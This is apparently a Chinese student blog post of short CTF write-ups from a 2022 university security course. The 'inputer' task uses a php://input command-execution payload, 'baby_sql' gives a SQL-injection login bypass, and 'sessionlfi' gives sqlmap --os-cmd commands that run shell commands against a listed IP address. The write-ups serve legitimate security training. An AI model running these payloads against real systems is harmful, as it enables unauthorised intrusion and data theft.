205 字
1 分钟
22年网安小学期-CTF

木册木兰#

img

  • 下载附件,然后根据提示可以看出就是栅栏密码,所以直接解密得到

img

inputer#

img

  • 先源码,这里要用到php://伪协议
  • 直接抓包然后改包,构造php://input,利用system("ls");输出当前目录下所包含的文件,发包后发现可利用

img

  • 那就直接用命令<?php system("cat /flag.txt");?>获得flag

img

WEB_blind_exec#

img

LFI#

img

baby_sql#

admin' or '1'='1

img

WEB_randnum#

img

WEB_babyphp#

img

easy_getshell#

img

sessionlfi#

  • 源码中发现页面传参使用get方法,猜测存在sql注入漏洞

img

测试payload:

sqlmap -u http://218.94.60.213:13198/table.php?id=1 -dbs

爆破数据库,共有4个数据库

img

使用sqlmap的-os-cmd远程执行命令,看到根目录有flag字样文件

sqlmap -u http://218.94.60.213:13198/table.php?id=1 —os-cmd=“ls /”

img

最后继续使用远程命令查看得到flag

sqlmap -u http://218.94.60.213:13198/table.php?id=1 —os-cmd=“cat /flag_asflkhasklfhaklshfkjlashfjkas”

img

happy#

  • 题目:

img

  • 解题代码:

img

rsarsa#

  • 题目:

img

  • 解题代码:

img

22年网安小学期-CTF
https://blog.crzliang.cn/archives/65465/
作者
Crzliang
发布于
2022-07-09
许可协议
CC BY-NC-SA 4.0